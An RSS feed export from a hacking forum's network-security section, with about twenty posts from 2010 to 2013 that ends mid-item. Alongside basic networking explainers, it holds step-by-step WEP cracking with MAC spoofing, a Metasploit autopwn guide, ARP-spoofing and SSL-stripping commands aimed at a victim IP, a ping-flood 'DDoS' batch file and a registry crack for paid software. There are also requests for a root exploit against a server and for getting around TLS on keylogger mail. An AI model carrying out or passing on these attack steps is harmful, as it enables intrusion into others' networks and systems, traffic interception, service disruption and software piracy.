<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
      <title>Network Security - iExploit</title>
      <link>http://iexploit.org/index.php?p=/categories/network-security/feed.rss</link>
      <pubDate>Sat, 25 May 13 17:25:54 -0400</pubDate>
         <description>Network Security - iExploit</description>
   <language>en-CA</language>
   <atom:link href="/index.php?p=/discussions/feed.rss" rel="self" type="application/rss+xml" />
   <item>
      <title>Should i Buy the Wifu Course?</title>
      <link>http://iexploit.org/index.php?p=/discussion/1821/should-i-buy-the-wifu-course</link>
      <pubDate>Fri, 17 Dec 2010 12:10:47 -0500</pubDate>
      <dc:creator>Xin</dc:creator>
      <guid isPermaLink="false">1821@/index.php?p=/discussions</guid>
      <description><![CDATA[Link here: <a class="postlink" rel="nofollow" href="http://www.offensive-security.com/documentation/wifu-syllabus.pdf">http://www.offensive-security.com/docum ... llabus.pdf</a><br><br>Its basically a training course on wireless hacking, you get 2.5 hours of videos and 300 pages on a ebook pdf + a chance to get certified in the exam. The price is 350$, the cert wont get you recognised really in the employer world but it will give you good knowledge.<br><br>Just wandering your thoughts on it?]]></description>
   </item>
   <item>
      <title>Transport Layer Security with SMTP</title>
      <link>http://iexploit.org/index.php?p=/discussion/6242/transport-layer-security-with-smtp</link>
      <pubDate>Mon, 07 Jan 2013 13:43:52 -0500</pubDate>
      <dc:creator>Mr. P-teo</dc:creator>
      <guid isPermaLink="false">6242@/index.php?p=/discussions</guid>
      <description><![CDATA[<span style="font-family: Arial, Verdana; font-size: small;">So iv been looking in wireshark at SMTP packets sent to gmail and one thing i noticed was the following.</span><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><br></div><div><div><span style="font-family: Arial, Verdana; font-size: small;">250-mx.google.com at your service, [ipaddress]</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">250-SIZE 35882577</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">250-8BITMIME</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">250-STARTTLS</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">250 ENHANCEDSTATUSCODES</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">STARTTLS</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">220 2.0.0 Ready to start TLS<br><br>I wanted to look further into this as it seems even with standard vb.net keyloggers the simple smtp email is sent and google forces the TLS stoping me from easily viewing the information within the packets. So what can i do to get around this? And where can i learn more about the inner workings of this?</span></div></div>]]></description>
   </item>
   <item>
      <title>Some networking basics</title>
      <link>http://iexploit.org/index.php?p=/discussion/2383/some-networking-basics</link>
      <pubDate>Thu, 03 Mar 2011 20:52:29 -0500</pubDate>
      <dc:creator>chroniccommand</dc:creator>
      <guid isPermaLink="false">2383@/index.php?p=/discussions</guid>
      <description><![CDATA[[-----------------------------------]<br>Originally meant for an addon to Xinapses guide<br>Author: Chroniccommand<br>I will be continuing with this on my free time. Enjoy.<br>[-----------------------------------]<br>Table of Contents:<br>0x01..OSI Model....<br>0x02..Sockets......<br>0x03..Packets......<br><br>0x01 OSI Model:<br>To understand the underlying framework of networking, you must understand the OSI Model. First of all, OSI stands for Open Systems Interconnection. The OSI model is the standard communication system used in networking. It works on layers, layers 1 - 7. I will list the layers and explain them here. <br><br><b><span style="text-decoration: underline;">First layer - Physical layer</span></b><br>The first layer is the physical layer. The physical layer deals with actual connections. It deals with things such as cables and communicating between them. The first layer mainly deals with connecting and terminating connections. But it doesn't exactly do the virtual connection. When I say it deals with connections, it deals with the communication between <b>mediums</b>. An example of a medium would be a router.<br><b>Subsection: What is a router?</b><br>So what exactly is a router? Well a router is just a computer. Yes, a computer. Like the one you're on now. Except it's stripped. It has a minimal Operating System, like BSD. It doesn't have a GUI or anything fancy, nor does it have a monitor. It's a piece of hardware that deals with communicating. Now when you connect to another system, your computer sends a <b>socket</b> to the router. The router uses the <b>physical layer</b> to connect from your computer to the router for computer B. So it would look a little something like this:<br><div class="PreContainer"><pre><br>|----------|<br>|Packet A  |   Contains header info etc<br>|----------|<br>     |<br>     |<br>     |                                        |-----------|<br>|----------|                                  |Computer B |<br>|Router A  |                                  |-----------|<br>|----------|      <br>     |                                             |<br>     |                                             |<br>     |                                             |<br>|----------------------------------|               |<br>|Passed through physical data layer| --------&amp;gt; |----------|<br>|----------------------------------|           |Router B|<br>                                               |----------|<br></pre></div><br>So computer A sends packet A which contains all info. It is then sent to router A. Router A just sends this packet through the physical data layer to Router B(Of course hitting other places in the process). Router B then identifies the packet and sends it to Computer B. <br><br>Anyway, back to the OSI model. <br><b><span style="text-decoration: underline;">Layer 2 - Data link layer</span></b><br>The second layer in the OSI model is the <b>Data link layer</b>. This layer will transfer data and correct errors in the Physical layer. That's all I'll go into for now with this layer. <br><br><b><span style="text-decoration: underline;">Layer 3 - Network layer</span></b><br>The third layer is the <b>Network layer</b>. This layer is another layer I won't go too much into. This layer is responsible for transporting data sequences. It also fragments and re-assembles network connections.<br><br><b><span style="text-decoration: underline;">Layer 4 - Transport layer</span></b><br>The fourth layer is the <b>Transport layer</b>. This layer is mainly responsible for transfer of data between end users. TCP and UDP both use this layer, so know this layer!<br><br><b><span style="text-decoration: underline;">Layer 5 - Session layer</span></b><br>This layer is the fifth layer. The <b>Session layer</b>. It manages and terminates connections between both remote and local connections. It is also responsible for closing connections in TCP. <br><br><b><span style="text-decoration: underline;">Layer 6 - Presentation layer</span></b><br>The sixth layer is the <b>Presentation layer</b>. This is another layer I won't go much into. All you really need to know is that it will provide independence from representation of data.<br><br><b><span style="text-decoration: underline;">Layer 7 - Application layer</span></b><br>The seventh and last layer of the OSI model is the <b>Application layer</b>. This layer will interact with network applications. That's the basics of that layer. <br><br>If you'd like to learn more about the OSI model, google :p<br><br>0x02 Sockets<br>So what exactly is a socket? You probably hear it all the time when you're talking about networking. But do you really know what it is? Well basically a socket allows bi-directional communication flow. Basically it looks kinda like this.<br>Socket 1 &lt;------------&gt; Socket 2<br><br>Sockets will let you send packets information over a network and lets you communicate. Sockets are the base of every networking application. There are 2 main socket types, and one not so known one.<br>[list=1]<br>[*]TCP(Transmission Control Protocol)[/*:m]<br>[*]UDP(User Datagram Protocol)[/*:m]<br>[*]Raw[/*:m][/list:o]<br>Now to go over the basics of each.<br><b>TCP</b><br>TCP stands for <b>Transmission Control Protocol</b>. TCP is part of the IP(Internet Protocol) suite. TCP provides a reliable connection using sockets. With a TCP socket, data is sent as one continuous stream until the connection is closed. This is more reliable than UDP, as UDP sends data less reliably and it may even lose parts of the message.<br><br><b>UDP</b><br>UDP stands for <b>User Datagram Protocol</b>. It works a bit differently from TCP. As I stated above, it sends data less reliably and parts of the message may even be lost. Even though this may happen, UDP has its uses. Some users for UDP are:<br>[list]<br>[*]DNS[/*:m]<br>[*]VoIP[/*:m]<br>[*]Online games[/*:m][/list:u]<br><br><b>Raw</b><br>A raw socket is the most simple type of socket out of the three. Basically it allows sending of data without encapsulating the packet for the Operating System. Basically that's all there is to really know about Raw IP packets.<br><br>0x03 IP<br>IP stands for <b>Internet Protocol</b>. It is used for communication using <b>sockets</b>. It is also responsible for mapping packets across networks. There are currently two major versions of IP<br>[list]<br>[*]IPv4[/*:m]<br>[*]IPv6[/*:m][/list:u]<br>IPv4 is the first major version. It is currently used the most. An IPv4 address looks like so:<br><div class="PreContainer"><pre>255&amp;#46;255&amp;#46;255&amp;#46;255</pre></div><br>This allows for tons of combinations of IP's. Unfortunately, IPv4 addresses are rapidly running out. Mainly because of the boom of mobile devices that require/have internet. <br><br>IPv6 is less used, but will soon be used by almost everything as we slowly transition from 4 to 6. IPv6 is a bit more advanced than IPv4. A typical IPv6 address will look something like this:<br><div class="PreContainer"><pre>2001&amp;#58;0db8&amp;#58;85a3&amp;#58;0000&amp;#58;0000&amp;#58;8a2e&amp;#58;0370&amp;#58;7334&amp;#46;</pre></div><br>This is of course more hard to remember than <div class="PreContainer"><pre>255&amp;#46;255&amp;#46;255&amp;#46;255</pre></div><br><br><b>Packets</b><br>Packets are sent over a socket. Packets contain information such as a header and a body. Much like a letter. Think of it like this.<br>Computer A crafts a packet with header information and body information. Much like a letter. Computer A sends it over to Computer B. Computer B gets the packet, dissects it and reads the header information, and proceeds to read the body. <br><br>Packets are a big part of networking as without packets we couldn't really communicate information.<br><br><b>Security against packets</b><br>A typical security issue is <b>Packet sniffing</b>. This involves capturing packets using an MITM(Man In The Middle) attack. The packet is then dissected to get the header and body information. This can be used to see what computer A is doing, since computers send packets to communicate information. This can of course be stumped by SSL. But of course SSL can be stripped. <br><br>Another security issue against packets is <b>packet crafting</b>. This involves an MITM attack. The man in the middle(the attacker), crafts a packet and sends it to computer A. Thus tricking computer A to think it's an official packet, even though it's the crafted packet created by the attacker.]]></description>
   </item>
   <item>
      <title>Rainbow Tables And Dictionary files used for WPA/WEP cracking</title>
      <link>http://iexploit.org/index.php?p=/discussion/6178/rainbow-tables-and-dictionary-files-used-for-wpawep-cracking</link>
      <pubDate>Fri, 14 Sep 2012 21:19:21 -0400</pubDate>
      <dc:creator>ReverseEngineering</dc:creator>
      <guid isPermaLink="false">6178@/index.php?p=/discussions</guid>
      <description><![CDATA[<b>Does anyone know good resources, or direct link for rainbow tables and dictionary files used for WPA/WEP cracking?</b>]]></description>
   </item>
   <item>
      <title>&quot;ISA Server/PIX firewall&quot;</title>
      <link>http://iexploit.org/index.php?p=/discussion/2112/isa-serverpix-firewall</link>
      <pubDate>Thu, 13 Jan 2011 23:36:07 -0500</pubDate>
      <dc:creator>McKittrick</dc:creator>
      <guid isPermaLink="false">2112@/index.php?p=/discussions</guid>
      <description><![CDATA[just curious, any of you on here ever manged any of these devices? i have read alot on CISCO PIX overall, but have never been in front of one. same goes for MS' ISA server. which one would you say is a better defense in a network environment? i have heard ISA servers have very robust abilities when it comes to drilling-down and delving in deep as far as packet/protocol inspection is concerned. thoughts?]]></description>
   </item>
   <item>
      <title>SOMEONE EXPLAIN THIS</title>
      <link>http://iexploit.org/index.php?p=/discussion/1836/someone-explain-this</link>
      <pubDate>Sat, 18 Dec 2010 22:37:10 -0500</pubDate>
      <dc:creator>McKittrick</dc:creator>
      <guid isPermaLink="false">1836@/index.php?p=/discussions</guid>
      <description><![CDATA[this might just be a theory but i have never seen it done so i ask:<br /><br />if one was to somehow control your local ISPs gateway that managed your entire subnet, would you see all the data that passed through it? the next question, would you have to have some type of ip forwarding in place as not to create a bottleneck and would your machine even be able to keep up? i have heard (in cases involving RIP poisoning) that if you set your interface on the router to 0, you are telling it you are directly connected. you then have precedence over all other traffic, as opposed to it being set at 1. so has this ever been done--full control over an ISP gateway?<br /><br />i would like to pose another question that relates slightly to the above: has anyone here ever read up on RSVP and how you can use it to manipulate a network into allowing your packets to have priority on the network as far as bandwidth goes?]]></description>
   </item>
   <item>
      <title>Metasploit autopwn with nessus</title>
      <link>http://iexploit.org/index.php?p=/discussion/1766/metasploit-autopwn-with-nessus</link>
      <pubDate>Sun, 05 Dec 2010 07:47:50 -0500</pubDate>
      <dc:creator>chroniccommand</dc:creator>
      <guid isPermaLink="false">1766@/index.php?p=/discussions</guid>
      <description><![CDATA[[-- Intro --]<br>This is a followup guide to my Nessus scanning guide. In this guide I'll show you how to import a Nessus scanned database into metasploit and execute autopwn to automatically launch an exploit found within Nessus.<br><br>[-- Database Work --]<br>So first we must open up metasploit(msfconsole). Once metasploit is open and loaded we're gonna have to load the .nessus file into metasploit. To do this we're going to first have to connect to a database. To create a database, type:<br><div class="PreContainer"><pre>db_create</pre></div><br>Now you have a newly created database. Now to connect to it. Just type:<br><div class="PreContainer"><pre>db_connect</pre></div><br>NOTE: Metasploit usually automatically connects you to the newly created database, but type that in case it doesn't. <br>Now that you're connected you're gonna have to import the .nessus file. To do this you're gonna have to type the following command:<br><div class="PreContainer"><pre>db_import_nessus_xml /home/chronic/nessus_scan&amp;#46;nessus</pre></div><br>This should import the .nessus file. <br>NOTE: If you have a .nbe file, change _xml to _nbe<br>Now type db_hosts to see the hosts you have in that file to make sure you're autopwn'ing the correct targets.<br><br>[-- Aut0pwning --]<br>Now to actually launch autopwn on the nessus targets. To do this, just type the following command:<br><div class="PreContainer"><pre>db_autopwn -t -e -x -p</pre></div><br>It should start running through the autopwn process :)<br><br><br>If all goes well, and it's exploited, you should get a meterpreter :D<br>If you need any help, feel free to ask<br><br>--Chroniccommand]]></description>
   </item>
   <item>
      <title>Tunneling Web Traffic through SSH</title>
      <link>http://iexploit.org/index.php?p=/discussion/6185/tunneling-web-traffic-through-ssh</link>
      <pubDate>Wed, 19 Sep 2012 13:24:41 -0400</pubDate>
      <dc:creator>redd3ath</dc:creator>
      <guid isPermaLink="false">6185@/index.php?p=/discussions</guid>
      <description><![CDATA[<div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; text-align: left;">Tried to check if someone had already wrote a tutorial previously on SSH and surprisingly I didn't find anything so&nbsp;<span style="font-size: 10pt;">I just thought I'd share this simple tutorial from my website.</span><span style="font-size: 10pt;">&nbsp;Basic stuff I know but relevant material for any security ninja or system admin. &nbsp;Also looking for contributors to write tutorials on my site as well! (really more of informational journal to harvest or log material I've learned in order to keep my mind fresh and sober upon it) Just PM me a tutorial you've written if you're interested and we would love to have you aboard with us. I would love to get some feedback from you guys! Thanks in advance! :)</span></div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; text-align: left;"><br></div><div style="text-align: left;"><span style="font-family: Arial, Verdana; font-size: small;"><a rel="nofollow" href="http://intimateintel.net/2012/08/18/tunneling-web-traffic-through-ssh/">http://intimateintel.net/2012/08/18/tunneling-web-traffic-through-ssh/</a></span></div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; text-align: left;"><br></div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; text-align: left;"><br></div>]]></description>
   </item>
   <item>
      <title>ARP Poisoning [PDF]</title>
      <link>http://iexploit.org/index.php?p=/discussion/2681/arp-poisoning-pdf</link>
      <pubDate>Tue, 19 Apr 2011 02:30:35 -0400</pubDate>
      <dc:creator>Sh3llc0d3</dc:creator>
      <guid isPermaLink="false">2681@/index.php?p=/discussions</guid>
      <description><![CDATA[Well this is my work done for today. Simple explanation of ARP Poisoning and attack vectors. Any problems let me know. I'll be adding further papers very soon.<br><br>Appropriate links given for more reading.<br><br>Enjoy,<br>Sh3llc0d3<br><br>Download: <a class="postlink" rel="nofollow" href="http://www.multiupload.com/QBHR43QRTX">http://www.multiupload.com/QBHR43QRTX</a>]]></description>
   </item>
   <item>
      <title>Need a bit of help .</title>
      <link>http://iexploit.org/index.php?p=/discussion/6195/need-a-bit-of-help-</link>
      <pubDate>Thu, 27 Sep 2012 08:17:04 -0400</pubDate>
      <dc:creator>Hardcore-Gabber</dc:creator>
      <guid isPermaLink="false">6195@/index.php?p=/discussions</guid>
      <description><![CDATA[Please someone cane give me a working exploit for this kernel .&nbsp; Have tried allot of exploits but could not get root..&nbsp;&nbsp; All publix exploits are bad or i am dooing something wrong <br><br><br><div style="text-align: center;"><b>Apache/2.0.63<br> (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 DAV/2 <br>mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 <br>mod_perl/2.0.4 Perl/v5.8.8. <a rel="nofollow" href="http://ip.ro/gabber.php?act=phpinfo" target="_blank"><b><span style="text-decoration: underline;">PHP/4.4.9</span></b></a></b></div><br><b>Kernel: Linux&nbsp; 2.6.18-238.el5PAE <a rel="nofollow" href="/index.php?p=/search&amp;Search=%231&amp;Mode=like">#1</a> SMP Thu Jan 13 17:10:20 EST 2011 i686</b><br><br><br>]]></description>
   </item>
   <item>
      <title>multiple authentication for Network computers?</title>
      <link>http://iexploit.org/index.php?p=/discussion/2677/multiple-authentication-for-network-computers</link>
      <pubDate>Sun, 17 Apr 2011 16:52:31 -0400</pubDate>
      <dc:creator>mandi</dc:creator>
      <guid isPermaLink="false">2677@/index.php?p=/discussions</guid>
      <description><![CDATA[hi guys,this question is just my imagination,<br />I just need to know the real world possibilities of my idea,<br /><br />As we know to access a pc in a network we need to provide the login credentials to access the pc<br /><br />we know  these  traditional security  systems like ACL's,routers,IDS,WAF's,switches are there to protect the network ,but these things are a big  problem only to low end hackers,but for high end hackers i dont think these things can fully  stop them,so here are some of  my question<br /><br /><br /><br />1))can we place multiple levels of login authentication to a single system on a network? <br /><br />2)Is it possible to implement in real life?if yes how?<br /><br />3)Also placing multiple network login schemes provides more security?<br />is it a good idea ? or just it is a waste of time?i had also heard that these kind of multiple authentication schemes are being used in cloud networks,is it true?(just asking to confirm things :) )<br /><br />4)Beyond the above mentioned  traditional security things <br />what are the high end security things are being developed for the future?i am much more interested to know the future technologies<br /><br />I am just posting here to get some ideas :)<br /><br />hope i will get some ideas ..]]></description>
   </item>
   <item>
      <title>How does reverse ip domain check up tool works?</title>
      <link>http://iexploit.org/index.php?p=/discussion/5793/how-does-reverse-ip-domain-check-up-tool-works</link>
      <pubDate>Tue, 30 Aug 2011 18:39:12 -0400</pubDate>
      <dc:creator>mandi</dc:creator>
      <guid isPermaLink="false">5793@/index.php?p=/discussions</guid>
      <description><![CDATA[I am sure most of the pen-testers here has used this tool<br /><br />"reverse ip domain check-up"<br /><br />(i.e when we enter the ip address or one of the web-sites name,it displays the name of all the web-sites hosted in it the ip address)<br /><br />I have been trying to understand the working logic behind this,<br />but unfortunately i couldn't find it.<br /><br /><br />i just want to know the working logic of this tool..<br /><br />As usual i  have got some questions regarding this:<br /><br />1)Is it possible for us to determine the number of web-sites running on a web-server manually?if yes how ?<br /><br />2) To which level  we can trust these information? <br /><br />3)how does this thing work?<br /><br />hope i will know the  working logic soon :)]]></description>
   </item>
   <item>
      <title>ssh_host_key</title>
      <link>http://iexploit.org/index.php?p=/discussion/6019/ssh_host_key</link>
      <pubDate>Mon, 07 May 2012 00:51:29 -0400</pubDate>
      <dc:creator>Hardcore-Gabber</dc:creator>
      <guid isPermaLink="false">6019@/index.php?p=/discussions</guid>
      <description><![CDATA[<br><br>I have founde this ssh_host_key.pub please someone cane tell me how to connect to it ..<br><br>this is half of the key that is inside of the .pub file .. <br><br><pre>2048 35 234563469683359904440919395217712953187528757751146433172629440433583992466340263318226001554480144271115821080689289418816416849463661054309577608701743498175668437147876912846006231722960701786526721249685891611904610069733059111406122199240611314419141700456158378471681893487322962704386668188800860488288082949618912232910393926894807669266943805923074421247976594396667040142583105720640549670303944921928566823335527448414355164629916664273585429671452161362548624900057504695829599094921372469477657</pre><br>]]></description>
   </item>
   <item>
      <title>[video] BlackHat USA 2010 Jackpotting ATM</title>
      <link>http://iexploit.org/index.php?p=/discussion/5773/video-blackhat-usa-2010-jackpotting-atm</link>
      <pubDate>Fri, 26 Aug 2011 17:52:12 -0400</pubDate>
      <dc:creator>mandi</dc:creator>
      <guid isPermaLink="false">5773@/index.php?p=/discussions</guid>
      <description><![CDATA[while i am surfing the internet i found out this<br>hope you guys will enjoy  it :)<br><br><div class="PreContainer"><pre><br>http&amp;#58;//vimeo&amp;#46;com/13841482<br></pre></div><br><br>cheers:)]]></description>
   </item>
   <item>
      <title>Freemind [Video]</title>
      <link>http://iexploit.org/index.php?p=/discussion/1722/freemind-video</link>
      <pubDate>Sat, 20 Nov 2010 16:06:12 -0500</pubDate>
      <dc:creator>Sh3llc0d3</dc:creator>
      <guid isPermaLink="false">1722@/index.php?p=/discussions</guid>
      <description><![CDATA[Short vid on how to use mind mapping with network security... web app security uses are demonstrated, I personally use more for network security.<br /><br />Enjoy<br />[align=center][video=youtube]<div class="Video"><object width="640" height="385"><param name="movie" value="http://www.youtube.com/v/mGy4b0pr_Dw[/video][/align]&amp;hl=en_US&amp;fs=1&amp;"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/mGy4b0pr_Dw[/video][/align]&amp;hl=en_US&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="385"></embed></object></div>]]></description>
   </item>
   <item>
      <title>Cracking WEP</title>
      <link>http://iexploit.org/index.php?p=/discussion/1910/cracking-wep</link>
      <pubDate>Sat, 25 Dec 2010 20:23:30 -0500</pubDate>
      <dc:creator>chroniccommand</dc:creator>
      <guid isPermaLink="false">1910@/index.php?p=/discussions</guid>
      <description><![CDATA[[Intro]<br>WEP stands for "Wired Equivalent Privacy". It's a security algorithm for IEEE 802.11 wireless networks. Many home routers use WEP to protect other people from connecting to that network. But of course, we can crack this and get into the router. NOTE: Cracking someones router password is illegal(I think). Don't do it unless it's your own network ;)<br><br>[Getting started]<br>Cracking WEP keys is actually pretty easy. All you need is some tools. Install aircrack-ng. <br><div class="PreContainer"><pre><br>sudo aptitude install aircrack-ng</pre></div><br>It should install all aircrack tools like airmon and airodump etc. Also, you should install macchanger to hide yourself. Now that you have the correct tools, you can get on with the tutorial.<br>NOTE: BackTrack4 has all the tools you need. I'd recommend installing it and using the tools on there.<br><br>[Cracking the WEP]<br>Now time to actually crack the WEP key. Start with:<br><div class="PreContainer"><pre>sudo airmon-ng</pre></div><br>This will list your wireless devices. Mine is on wlan0.<br><div class="PreContainer"><pre><br>sudo airmon-ng start &amp;#91;interface&amp;#93;<br></pre></div><br>For me, I put wlan0 for interface. This will start monitor mode on wlan0. Now mon0 is enabled. Now we hide your MAC address.<br><div class="PreContainer"><pre><br>sudo ifconfig mon0 down<br>sudo macchanger -m 00&amp;#58;11&amp;#58;22&amp;#58;33&amp;#58;44&amp;#58;55 mon0<br>sudo ifconfig mon0 up<br></pre></div><br>Now mon0's mac is 00:11:22:33:44:55<br>Now type:<br><div class="PreContainer"><pre><br>sudo airodump-ng --encrypt wep mon0<br></pre></div><br>You'll get a screen listing BSSID, ESSID, Data#, Encryption type etc.<br>Now wait a sec and you'll get the available networks for cracking. Exit that screen with ctrl-C to go back to the terminal.<br>Now to filter networks.<br><div class="PreContainer"><pre><br>sudo airodump-ng --bssid &amp;#91;bssid&amp;#93; -c &amp;#91;channel&amp;#93; -w &amp;#91;Filename&amp;#93; mon0<br></pre></div><br>For bssid, input the bssid of the network you wish to crack.<br>For example:<br><div class="PreContainer"><pre>sudo airodump-ng --bssid 01&amp;#58;AF&amp;#58;C7&amp;#58;A4&amp;#58;14&amp;#58;8F  -c 1 -w esponet mon0</pre></div><br><br>Now we must collect data so we can crack it with aircrack-ng. <br><div class="PreContainer"><pre><br>sudo aireplay-ng -1 0 -a &amp;#91;bssid&amp;#93; -h &amp;#91;mon0 mac&amp;#93; -e &amp;#91;essid&amp;#93; mon0</pre></div><br>For mon0 mac, input 00:11:22:33:44:55 (Or whatever you changed mon0's mac to). <br>Now we need to collect more data. Type:<br><div class="PreContainer"><pre><br>sudo aireplay-ng -3 -b &amp;#91;bssid&amp;#93; -h &amp;#91;mon0 mac&amp;#93; mon0<br></pre></div><br>Now go to your airodump tab and the <a rel="nofollow" href="/index.php?p=/search&amp;Search=%23DATA&amp;Mode=like">#DATA</a> tab should be rising more rapidly.<br><br>Now to actually crack the captured data.<br><div class="PreContainer"><pre><br>sudo aircrack-ng filename&amp;#46;cap<br></pre></div><br>Change filename.cap to something like [esponet.cap] or whatever the network you wish to crack's name is. You should get a window showing keys. Leave that alone and let aircrack do its thing. Once it's done the key will show up. For example:<br><div class="PreContainer"><pre><br>KEY FOUND! &amp;#91; 12&amp;#58;34&amp;#58;56&amp;#58;78 &amp;#93;<br></pre></div><br>The key would be 12345678<br><br>Have fun cracking.<br><br>--Chroniccommand]]></description>
   </item>
   <item>
      <title>Wifi Hopper 1.2 (FULL) Wardriving</title>
      <link>http://iexploit.org/index.php?p=/discussion/2607/wifi-hopper-1-2-full-wardriving</link>
      <pubDate>Thu, 31 Mar 2011 05:40:17 -0400</pubDate>
      <dc:creator>zer0day</dc:creator>
      <guid isPermaLink="false">2607@/index.php?p=/discussions</guid>
      <description><![CDATA[[align=center]<span><b>WIFI HOPPER v1.2</b></span><br><br>Description:<br><br>WiFi Hopper is a WLAN utility that combines the features of a Network Discovery and Site Survey tool with a Connection Manager.<br><br>Sporting a comprehensive arsenal of network details, filters, RSSI graphing and built-in GPS support, WiFi Hopper is invaluable for identification and advanced characterization of neighboring wireless devices.<br><br>Additionally, WiFi Hopper can connect to unsecured, WEP, WPA-PSK and WPA2-PSK networks directly from within the application. With editable network profiles and dedicated Connection Manager execution mode, WiFi Hopper can be used as a significantly more transparent replacement for Windows and manufacturer-provided wireless clients.<br><br>Screenshot:<br><br>http&#58;//i292&#46;photobucket&#46;com/albums/mm25/bktruss/shot_vista&#46;png<br><br>1. Download the Trial from <span style="text-decoration: underline;">HERE</span><br>2. Copy and paste the code below into notepad and save as whatever.reg<br><div class="PreContainer"><pre>Windows Registry Editor Version 5&amp;#46;00<br><br>&amp;#91;HKEY_LOCAL_MACHINE\SOFTWARE\WiFi Hopper&amp;#93;<br>\&quot;SMInfo\&quot;=\&quot;WiFi Hopper\&quot;<br>\&quot;INSTInfo\&quot;=\&quot;C&amp;#58;\\Program Files\\WiFi Hopper\&quot;<br>\&quot;ITInfo\&quot;=hex&amp;#58;c7,de,79,a3,6b,97,58,01,57,93,01,50,96,cd,dd,da,01,d3,dc,b3,4c,c3,\<br>  88,71<br>\&quot;UInfo\&quot;=hex&amp;#58;7c,33,d9,1e,c5,e5,c0,c2,87,38,d2,bf,9c,0c,68,19,db,8f,0c,08,c8,f1,\<br>  e4,5a<br>\&quot;SInfo\&quot;=hex&amp;#58;db,33,f5,19,6c,17,d8,6f,19,3d,4b,ea,f1,76,e4,45,b3,a5,ee,69,9f,cc,\<br>  e8,ae</pre></div><br>3. Install Wifi Hopper v1.2<br>4. Run .reg file and click yes<br>5. Run Wifi Hopper, should be a registered Full version now [/align]]]></description>
   </item>
   <item>
      <title>Ping Of Death [Works]</title>
      <link>http://iexploit.org/index.php?p=/discussion/2786/ping-of-death-works</link>
      <pubDate>Fri, 10 Jun 2011 02:14:34 -0400</pubDate>
      <dc:creator>Prariredog</dc:creator>
      <guid isPermaLink="false">2786@/index.php?p=/discussions</guid>
      <description><![CDATA[Run in .bat<br><div class="PreContainer"><pre><a rel="nofollow" href="/index.php?p=/profile/echo">@echo</a><br>&#58;1<br>ping -n &#91;HOW BIG PACKETS SEND 200 300 EG&#93; &#91;IP/WEBSITE&#93;<br>/C<br>goto &#58;1<br><a rel="nofollow" href="/index.php?p=/profile/echo">@echo</a> off</pre></div><br>edit -n [insert how much u want to be sent]<br><br>Download:<br>DDOSATTACK<br>Create Shortcut and hit edit then edit it.<br><br>VirusTOTAL:<br>None<br>VirusTotalScan]]></description>
   </item>
   <item>
      <title>[help] Got strucked in last step of ssl stripping</title>
      <link>http://iexploit.org/index.php?p=/discussion/2426/help-got-strucked-in-last-step-of-ssl-stripping</link>
      <pubDate>Mon, 07 Mar 2011 11:31:52 -0500</pubDate>
      <dc:creator>mandi</dc:creator>
      <guid isPermaLink="false">2426@/index.php?p=/discussions</guid>
      <description><![CDATA[Here is the scenaario<br><br>my back-track ip(i am using backtrack 4 inside vmware)-- 192.168.12.37<br>victim ip(windows 7) 192.168.12.40<br>default gateway 192.168.1.4(windows 2003 server)<br><br>sub-net mask for all ip's 255.255.240.0<br><br><br>first i fired up a shell<br>and typed<br><div class="PreContainer"><pre><br><br>echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward<br><br><br>iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000<br></pre></div><br><br>opened another shell<br><br>arpspoof -i eth0 -t 192.168.12.40 192.168.1.4<br><br><br>step 3:<br><br>start---&gt;backtrack---&gt;privilegeescalation---&gt;all---&gt;spoofing--&gt;ssl strip<br><br>opened the tool and then i typed <br><br>sslstrip -a<br><br><br>opened another shell typed<br><br>ettertcap -T -q -i -eth0<br><br>i am getting errors instead of sucess :(<br><br><div class="PreContainer"><pre><br>ettercap NG-0&amp;#46;7&amp;#46;3 copyright 2001-2004 ALoR &amp; NaGA<br><br>Listening on -eth0&amp;#46;&amp;#46;&amp;#46;<br>ERROR &amp;#58; 19, No such device<br>&amp;#91;ec_capture&amp;#46;c&amp;#58;capture_init&amp;#58;146&amp;#93;<br><br> pcap_open&amp;#58; SIOCGIFHWADDR&amp;#58; No such device<br><br></pre></div><br><br>i don't know what is wrong at the last step?<br><br>how to  rectify this error?<br><br>can some one help me?]]></description>
   </item>
   <item>
      <title>NetDog</title>
      <link>http://iexploit.org/index.php?p=/discussion/2670/netdog</link>
      <pubDate>Fri, 15 Apr 2011 23:38:11 -0400</pubDate>
      <dc:creator>chroniccommand</dc:creator>
      <guid isPermaLink="false">2670@/index.php?p=/discussions</guid>
